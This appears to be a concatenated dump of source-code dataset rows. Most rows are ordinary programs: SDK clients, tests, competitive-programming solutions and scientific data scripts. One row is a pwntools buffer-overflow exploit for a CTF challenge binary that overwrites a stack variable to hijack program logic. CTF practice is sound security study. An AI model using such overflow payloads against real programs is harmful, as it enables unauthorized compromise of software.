<UNIQUEIDTYPE>CUSIP</UNIQUEIDTYPE>
</SECID>
<SECNAME>{sec.name}</SECNAME>
<TICKER>{sec.ticker}</TICKER>
</SECINFO>
</MFINFO>
"""
).strip()
yield dedent(
"""
</SECLIST>
</SECLISTMSGSRSV1>
</OFX>
"""
).strip()
def remove_bad(data):
"""
PayChex seems to have other behaviors that yield bad data
in the CSV. Log the presence of these rows and exclude
them.
"""
for n, row in enumerate(data, start=1):
if row['Ticker'] == 'null':
log.warning(f"Encountered bad row {n}: {row}")
continue
yield row
@autocommand.autocommand(__name__)
def main(csv_filename, ofx_filename, limit: int = None):
"""
Create a new OFX file based on the CSV and OFX downloads from
PayChex.
"""
logging.basicConfig(level=logging.INFO)
csv_filename = os.path.expanduser(csv_filename)
ofx_filename = os.path.expanduser(ofx_filename)
ofx = ofxparse.OfxParser.parse(open(ofx_filename))
for line in header(ofx):
print(line)
dialect = copy.copy(csv.excel)
dialect.skipinitialspace = True
data = csv.DictReader(open(csv_filename), dialect=dialect)
securities = {security.ticker: security for security in ofx.security_list}
for row in itertools.islice(remove_bad(data), limit):
for line in to_ofx(row, securities):
print(line)
for line in footer(ofx):
print(line)
|
[
"jaraco@jaraco.com"
] |
jaraco@jaraco.com
|
efbf8677c2ce4ad6ed0ecb013edc7f601f9907bf
|
978248bf0f275ae688f194593aa32c267832b2b6
|
/xlsxwriter/test/styles/test_write_cell_style.py
|
e348931f5c8422daa52141da17985d77bc95e182
|
[
"BSD-2-Clause-Views"
] |
permissive
|
satish1337/XlsxWriter
|
b0c216b91be1b74d6cac017a152023aa1d581de2
|
0ab9bdded4f750246c41a439f6a6cecaf9179030
|
refs/heads/master
| 2021-01-22T02:35:13.158752
| 2015-03-31T20:32:28
| 2015-03-31T20:32:28
| 33,300,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...styles import Styles
class TestWriteCellStyle(unittest.TestCase):
"""
Test the Styles _write_cell_style() method.
"""
def setUp(self):
self.fh = StringIO()
self.styles = Styles()
self.styles._set_filehandle(self.fh)
def test_write_cell_style(self):
"""Test the _write_cell_style() method"""
self.styles._write_cell_style()
exp = """<cellStyle name="Normal" xfId="0" builtinId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
f02305cf4e2591a356cae884abd638de7a8fa9fc
|
cbf9f600374d7510988632d7dba145c8ff0cd1f0
|
/abc/190/c.py
|
07fa190a978955b4555478224dd795a4394b14cf
|
[] |
no_license
|
sakakazu2468/AtCoder_py
|
d0945d03ad562474e40e413abcec39ded61e6855
|
34bdf39ee9647e7aee17e48c928ce5288a1bfaa5
|
refs/heads/master
| 2022-04-27T18:32:28.825004
| 2022-04-21T07:27:00
| 2022-04-21T07:27:00
| 225,844,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 719
|
py
|
n, m = map(int, input().split())
condition = []
for i in range(m):
a, b = map(int, input().split())
condition.append([a, b])
k = int(input())
ball = []
for i in range(k):
c, d = map(int, input().split())
ball.append([c, d])
decision = []
for intnum in range(2**k):
binnum = bin(intnum)[2:]
binnum = binnum.zfill(k)
state = []
for j in range(len(binnum)):
state.append(ball[j][int(binnum[j])])
decision.append(state)
max_satis = -1
for i in range(len(decision)):
satis = 0
for j in range(len(condition)):
if (condition[j][0] in decision[i]) and (condition[j][1] in decision[i]):
satis += 1
max_satis = max(max_satis, satis)
print(max_satis)
|
[
"sakakazu2468@icloud.com"
] |
sakakazu2468@icloud.com
|
69c3575e4bc800259603a29d1a2a5811c432892c
|
bd3b4a3403ad0476d287eb555bbe4211134b093e
|
/nuitka/codegen/templates/CodeTemplatesIterators.py
|
720c515a35f61ab167035473f612312da61f9a33
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
suryansh2020/Nuitka
|
7ecff5bd0199a6510e446be13569c829ba165be5
|
3dd382e91884a77c28aeee6b0bd44a0fc58beee8
|
refs/heads/master
| 2021-01-19T14:28:47.154859
| 2014-12-21T07:34:12
| 2014-12-21T07:34:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,885
|
py
|
# Copyright 2014, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Templates for the iterator handling.
"""
template_iterator_check = """\
// Check if iterator has left-over elements.
assertObject( %(iterator_name)s ); assert( PyIter_Check( %(iterator_name)s ) );
%(attempt_name)s = (*Py_TYPE( %(iterator_name)s )->tp_iternext)( %(iterator_name)s );
if (likely( %(attempt_name)s == NULL ))
{
// TODO: Could first fetch, then check, should be faster.
if ( !ERROR_OCCURED() )
{
}
else if ( PyErr_ExceptionMatches( PyExc_StopIteration ))
{
PyErr_Clear();
}
else
{
PyErr_Fetch( &exception_type, &exception_value, (PyObject **)&exception_tb );
%(release_temps_1)s
goto %(exception_exit)s;
}
}
else
{
Py_DECREF( %(attempt_name)s );
// TODO: Could avoid PyErr_Format.
#if PYTHON_VERSION < 300
PyErr_Format( PyExc_ValueError, "too many values to unpack" );
#else
PyErr_Format( PyExc_ValueError, "too many values to unpack (expected %(count)d)" );
#endif
PyErr_Fetch( &exception_type, &exception_value, (PyObject **)&exception_tb );
%(release_temps_2)s
goto %(exception_exit)s;
}"""
|
[
"kay.hayen@gmail.com"
] |
kay.hayen@gmail.com
|
0bdf3e816ff9ec54f042fc647c0bff60a6dfa776
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/kuv_16078+1916/sdB_kuv_16078+1916_lc.py
|
e2e7da47b7b2cee664f35675ccc1dfa277b97a7f
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[242.511208,19.132844], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_kuv_16078+1916/sdB_kuv_16078+1916_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
5f3d93adb6e1b349c18fda1d3b4c003973388250
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00-BofVar/cuctf19_bof1/verified-exploit-BofVar-1.py
|
c2f027d3b604c21593fd4310b04ec142c6764730
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318
| 2020-10-05T06:45:16
| 2020-10-05T06:45:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,103
|
py
|
# +------------------------------------------------+
# | Atack: Overwrite Variables |
# +------------------------------------------------+
#
# For more info checkout: https://github.com/guyinatuxedo/nightmare/tree/master/modules/04-bof_variable
from pwn import *
import time
import sf
target = process("./chall-test_cuctf19-bof1")
gdb.attach(target)
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x18, 0x1)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.interactive()
# +------------------------------------------------+
# | Artist: Avenged Sevenfold |
# +------------------------------------------------+
# | Song: Hail to the King |
# +------------------------------------------------+
# | There's a taste of fear |
# | when the henchmen call |
# | iron fist to tame the lands |
# | iron fist to claim it all |
# +------------------------------------------------+
|
[
"ryancmeinke@gmail.com"
] |
ryancmeinke@gmail.com
|
f430a0ac37b1b88571218138a666585365a31784
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/iothub/azure-mgmt-iothub/azure/mgmt/iothub/v2022_04_30_preview/_iot_hub_client.py
|
47230c84ab3900aa522476f57ff1fb01a0045485
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,158
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from copy import deepcopy
from typing import Any, TYPE_CHECKING
from azure.core.rest import HttpRequest, HttpResponse
from azure.mgmt.core import ARMPipelineClient
from . import models as _models
from .._serialization import Deserializer, Serializer
from ._configuration import IotHubClientConfiguration
from .operations import (
CertificatesOperations,
IotHubOperations,
IotHubResourceOperations,
Operations,
PrivateEndpointConnectionsOperations,
PrivateLinkResourcesOperations,
ResourceProviderCommonOperations,
)
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials import TokenCredential
class IotHubClient: # pylint: disable=client-accepts-api-version-keyword,too-many-instance-attributes
"""Use this API to manage the IoT hubs in your Azure subscription.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.iothub.v2022_04_30_preview.operations.Operations
:ivar iot_hub_resource: IotHubResourceOperations operations
:vartype iot_hub_resource:
azure.mgmt.iothub.v2022_04_30_preview.operations.IotHubResourceOperations
:ivar resource_provider_common: ResourceProviderCommonOperations operations
:vartype resource_provider_common:
azure.mgmt.iothub.v2022_04_30_preview.operations.ResourceProviderCommonOperations
:ivar certificates: CertificatesOperations operations
:vartype certificates: azure.mgmt.iothub.v2022_04_30_preview.operations.CertificatesOperations
:ivar iot_hub: IotHubOperations operations
:vartype iot_hub: azure.mgmt.iothub.v2022_04_30_preview.operations.IotHubOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources:
azure.mgmt.iothub.v2022_04_30_preview.operations.PrivateLinkResourcesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections:
azure.mgmt.iothub.v2022_04_30_preview.operations.PrivateEndpointConnectionsOperations
:param credential: Credential needed for the client to connect to Azure. Required.
:type credential: ~azure.core.credentials.TokenCredential
:param subscription_id: The subscription identifier. Required.
:type subscription_id: str
:param base_url: Service URL. Default value is "https://management.azure.com".
:type base_url: str
:keyword api_version: Api Version. Default value is "2022-04-30-preview". Note that overriding
this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
"""
def __init__(
self,
credential: "TokenCredential",
subscription_id: str,
base_url: str = "https://management.azure.com",
**kwargs: Any
) -> None:
self._config = IotHubClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
self._client: ARMPipelineClient = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in _models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self._serialize.client_side_validation = False
self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
self.iot_hub_resource = IotHubResourceOperations(self._client, self._config, self._serialize, self._deserialize)
self.resource_provider_common = ResourceProviderCommonOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.certificates = CertificatesOperations(self._client, self._config, self._serialize, self._deserialize)
self.iot_hub = IotHubOperations(self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize
)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize
)
def _send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:
"""Runs the network request through the client's chained policies.
>>> from azure.core.rest import HttpRequest
>>> request = HttpRequest("GET", "https://www.example.org/")
<HttpRequest [GET], url: 'https://www.example.org/'>
>>> response = client._send_request(request)
<HttpResponse: 200 OK>
For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request
:param request: The network request you want to make. Required.
:type request: ~azure.core.rest.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to False.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.rest.HttpResponse
"""
request_copy = deepcopy(request)
request_copy.url = self._client.format_url(request_copy.url)
return self._client.send_request(request_copy, **kwargs)
def close(self) -> None:
self._client.close()
def __enter__(self) -> "IotHubClient":
self._client.__enter__()
return self
def __exit__(self, *exc_details: Any) -> None:
self._client.__exit__(*exc_details)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
25e7256a2278380559a276d1b3e444401d66c3f7
|
14bca3c05f5d8de455c16ec19ac7782653da97b2
|
/lib/kubernetes/client/models/v1beta1_custom_resource_subresource_scale.py
|
ed95df565c96d745a54209552e5348bb1e35de08
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hovu96/splunk_as_a_service_app
|
167f50012c8993879afbeb88a1f2ba962cdf12ea
|
9da46cd4f45603c5c4f63ddce5b607fa25ca89de
|
refs/heads/master
| 2020-06-19T08:35:21.103208
| 2020-06-16T19:07:00
| 2020-06-16T19:07:00
| 196,641,210
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,791
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1CustomResourceSubresourceScale(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'label_selector_path': 'str',
'spec_replicas_path': 'str',
'status_replicas_path': 'str'
}
attribute_map = {
'label_selector_path': 'labelSelectorPath',
'spec_replicas_path': 'specReplicasPath',
'status_replicas_path': 'statusReplicasPath'
}
def __init__(self, label_selector_path=None, spec_replicas_path=None, status_replicas_path=None):
"""
V1beta1CustomResourceSubresourceScale - a model defined in Swagger
"""
self._label_selector_path = None
self._spec_replicas_path = None
self._status_replicas_path = None
self.discriminator = None
if label_selector_path is not None:
self.label_selector_path = label_selector_path
self.spec_replicas_path = spec_replicas_path
self.status_replicas_path = status_replicas_path
@property
def label_selector_path(self):
"""
Gets the label_selector_path of this V1beta1CustomResourceSubresourceScale.
LabelSelectorPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Selector. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. Must be set to work with HPA. If there is no value under the given path in the CustomResource, the status label selector value in the /scale subresource will default to the empty string.
:return: The label_selector_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._label_selector_path
@label_selector_path.setter
def label_selector_path(self, label_selector_path):
"""
Sets the label_selector_path of this V1beta1CustomResourceSubresourceScale.
LabelSelectorPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Selector. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. Must be set to work with HPA. If there is no value under the given path in the CustomResource, the status label selector value in the /scale subresource will default to the empty string.
:param label_selector_path: The label_selector_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
self._label_selector_path = label_selector_path
@property
def spec_replicas_path(self):
"""
Gets the spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
SpecReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Spec.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .spec. If there is no value under the given path in the CustomResource, the /scale subresource will return an error on GET.
:return: The spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._spec_replicas_path
@spec_replicas_path.setter
def spec_replicas_path(self, spec_replicas_path):
"""
Sets the spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
SpecReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Spec.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .spec. If there is no value under the given path in the CustomResource, the /scale subresource will return an error on GET.
:param spec_replicas_path: The spec_replicas_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
if spec_replicas_path is None:
raise ValueError("Invalid value for `spec_replicas_path`, must not be `None`")
self._spec_replicas_path = spec_replicas_path
@property
def status_replicas_path(self):
"""
Gets the status_replicas_path of this V1beta1CustomResourceSubresourceScale.
StatusReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. If there is no value under the given path in the CustomResource, the status replica value in the /scale subresource will default to 0.
:return: The status_replicas_path of this V1beta1CustomResourceSubresourceScale.
:rtype: str
"""
return self._status_replicas_path
@status_replicas_path.setter
def status_replicas_path(self, status_replicas_path):
"""
Sets the status_replicas_path of this V1beta1CustomResourceSubresourceScale.
StatusReplicasPath defines the JSON path inside of a CustomResource that corresponds to Scale.Status.Replicas. Only JSON paths without the array notation are allowed. Must be a JSON Path under .status. If there is no value under the given path in the CustomResource, the status replica value in the /scale subresource will default to 0.
:param status_replicas_path: The status_replicas_path of this V1beta1CustomResourceSubresourceScale.
:type: str
"""
if status_replicas_path is None:
raise ValueError("Invalid value for `status_replicas_path`, must not be `None`")
self._status_replicas_path = status_replicas_path
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1CustomResourceSubresourceScale):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"robert.fujara@gmail.com"
] |
robert.fujara@gmail.com
|
71335d29712b442c9ce5d95ca32fd48dad3c6e99
|
0567fcd808397a7024b5009cc290de1c414eff06
|
/src/1470.shuffle-the-array.py
|
7f9045ee0e7612652fc26cad85239700fb747fbe
|
[] |
no_license
|
tientheshy/leetcode-solutions
|
d3897035a7fd453b9f47647e95f0f92a03bff4f3
|
218a8a97e3926788bb6320dda889bd379083570a
|
refs/heads/master
| 2023-08-23T17:06:52.538337
| 2021-10-03T01:47:50
| 2021-10-03T01:47:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 562
|
py
|
#
# @lc app=leetcode id=1470 lang=python3
#
# [1470] Shuffle the Array
#
# @lc code=start
class Solution:
# 80 ms, 50.80%. Time: O(N). Space: O(N). Could be better using Bit manipulation to make it O(1) Space
# More here: https://leetcode.com/problems/shuffle-the-array/discuss/675956/In-Place-O(n)-Time-O(1)-Space-With-Explanation-and-Analysis
def shuffle(self, nums: List[int], n: int) -> List[int]:
ans = []
for i in range(n):
ans.append(nums[i])
ans.append(nums[i + n])
return ans
# @lc code=end
|
[
"trung.nang.hoang@gmail.com"
] |
trung.nang.hoang@gmail.com
|
d0a9e939c12148512e62d5cb50faeaf448f9dc4a
|
489d0c9b861e22dbb781c87c6e509bd2d04e783d
|
/codes/Feature Extraction/FeatureExtraction(3 features).py
|
d53977ab65b673c802b375f3f72da2e1d21612b3
|
[] |
no_license
|
sameesayeed007/Prediction-of-Epileptic-Seizures-using-SVM-and-DSP
|
24af3755b4c2bd4646d05df52f4f306ed2902ab0
|
cdd972551f9cea1a90cc957f33ac656a09e48c9f
|
refs/heads/master
| 2022-06-19T00:10:38.822712
| 2020-05-10T16:59:23
| 2020-05-10T16:59:23
| 262,826,669
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,733
|
py
|
import numpy as np
import scipy as sp
import scipy.fftpack
import pandas as pd
from scipy.fftpack import fft, fftfreq, fftshift
import statistics
import scipy.fftpack
thesis_final_files = ['chb01_21Final.csv','chb01_26Final.csv']
iterator = 0
while(iterator < len(thesis_final_files)) :
file_name = thesis_final_files[iterator]
data = pd.read_csv(file_name)
a=[]
d=0
for i in range(23):
Channel = data.iloc[:,i]
num_of_iterations = int((len(Channel)-1)/2560)
# making a list of lists with 10 seconds data
#a=[]
p=0
q= 2560
b=[]
for i in range(num_of_iterations):
c=[]
for j in range(2560):
c.append(Channel[p])
p+=1
b.append(c)
a.append(b)
print(d)
d=d+1
print('**1**')
def angle(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
#Calculating the angle
out_angle = np.angle(fftshift_values, deg = True)
#print ("output angle in degrees : ", out_angle)
out_angle2=statistics.mean(abs(out_angle))
#print("Mean angle: ")
return out_angle2
#Calculates the energy
def energy(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
ps = 2.0*(np.abs(fft_values/n)**2)
#Calculating the mean of power spectrum-energy
ps_mean = statistics.mean(ps)
return ps_mean
#Calculates tthe amplitude
def amplitude(a):
#no of points
n=2560
#Time period is 10s
Lx=10
x=np.linspace(0,Lx,n)
#Creating all the necessary frequencies
freqs=fftfreq(n)
#mask array to be used for power spectra
#ignoring half the values, as they are complex conjugates of the other
mask=freqs>0
#FFT values
fft_values=fft(a)
#true theoretical fft values
fft_theo = 2.0*np.abs(fft_values/n)
#FFT shift
fftshift_values = fftshift(fft_values)
amplitudes = 2 / n * np.abs(fft_values)
amplitudes_mean = statistics.mean(amplitudes)
return amplitudes_mean
#Channel=[]
Channel=[] #23
#tenseconds=[]
for m in range(23):
tenseconds=[]
for n in range(540):
features=[]
angle_value=angle(a[m][n])
features.append(angle_value)
energy_value=energy(a[m][n])
features.append(energy_value)
amplitude_value=amplitude(a[m][n])
features.append(amplitude_value)
tenseconds.append(features)
Channel.append(tenseconds)
print('**2**')
w=1
x=[]
df1 = pd.DataFrame()
ind=[]
for j in range(540):
ind.append(w)
w=w+1
df1['index']=ind
C="c"
F='f'
for i in range(23):
for f in range(3):
g=[]
name="C"+str(i+1)+"F"+str(f+1)
for j in range(540):
r=Channel[i][j][f]
g.append(r)
df1[name]=g
cvalue=[]
for i in range(360):
cvalue.append(0)
for j in range(180):
cvalue.append(1)
df1['class']=cvalue
saved_feature_file_name = file_name[0:8] + 'S.csv'
df1.to_csv(saved_feature_file_name,index=False)
print('**3**')
iterator += 1
print('***********************************************')
|
[
"sameesayeed880@gmail.com"
] |
sameesayeed880@gmail.com
|
a65d1a542c88c350b4f72b6ab7ca1593bca262a2
|
07ec5a0b3ba5e70a9e0fb65172ea6b13ef4115b8
|
/lib/python3.6/site-packages/tensorflow/contrib/labeled_tensor/python/ops/sugar.py
|
a80c8809882161ab99456117a0e3bd46222439f1
|
[] |
no_license
|
cronos91/ML-exercise
|
39c5cd7f94bb90c57450f9a85d40c2f014900ea4
|
3b7afeeb6a7c87384049a9b87cac1fe4c294e415
|
refs/heads/master
| 2021-05-09T22:02:55.131977
| 2017-12-14T13:50:44
| 2017-12-14T13:50:44
| 118,736,043
| 0
| 0
| null | 2018-01-24T08:30:23
| 2018-01-24T08:30:22
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:bd2f92e1bb5733974c243de95a2275942d5c2567b858a4babde5074896e254c0
size 4821
|
[
"seokinj@jangseog-in-ui-MacBook-Pro.local"
] |
seokinj@jangseog-in-ui-MacBook-Pro.local
|
310d466c5d33bc5941084acae385c83ac0b33b25
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/rna-transcription/fc224d30443944ccb7072df9ef1a4e3b.py
|
e0bfc8d46549b897dc275dd321beb33d587074e7
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
__author__ = 'shandr'
def to_rna(dna):
rna_list = []
dna_rna_map = {'G':'C','C':'G','T':'A','A':'U'}
for letter in dna:
rna_list.append(dna_rna_map[letter])
rna = ''.join(rna_list)
return rna
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
258f78e6084bfc82db551b44bb0c9ecd4317def7
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/01_netCDF_extraction/merra902Combine/514-tideGauge.py
|
93ddf87ea463c8e4498d9c7309742f95dda401cf
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,376
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 17 11:28:00 2020
--------------------------------------------
Load predictors for each TG and combine them
--------------------------------------------
@author: Michael Tadesse
"""
import os
import pandas as pd
#define directories
# dir_name = 'F:\\01_erainterim\\01_eraint_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraLocalized"
dir_out = "/lustre/fs0/home/mtadesse/merraAllCombined"
def combine():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 514
y = 515
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
#looping through each TG folder
os.chdir(tg_name)
#check for empty folders
if len(os.listdir()) == 0:
continue
#defining the path for each predictor
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp.csv'),\
"wnd_u": os.path.join(where, 'wnd_u.csv'),\
'wnd_v' : os.path.join(where, 'wnd_v.csv')}
first = True
for pr in csv_path.keys():
print(tg_name, ' ', pr)
#read predictor
pred = pd.read_csv(csv_path[pr])
#remove unwanted columns
pred.drop(['Unnamed: 0'], axis = 1, inplace=True)
#sort based on date as merra files are scrambled
pred.sort_values(by = 'date', inplace=True)
#give predictor columns a name
pred_col = list(pred.columns)
for pp in range(len(pred_col)):
if pred_col[pp] == 'date':
continue
pred_col[pp] = pr + str(pred_col[pp])
pred.columns = pred_col
#merge all predictors
if first:
pred_combined = pred
first = False
else:
pred_combined = pd.merge(pred_combined, pred, on = 'date')
#saving pred_combined
os.chdir(dir_out)
tg_name = str(tg)+"_"+tg_name;
pred_combined.to_csv('.'.join([tg_name, 'csv']))
os.chdir(dir_in)
print('\n')
#run script
combine()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.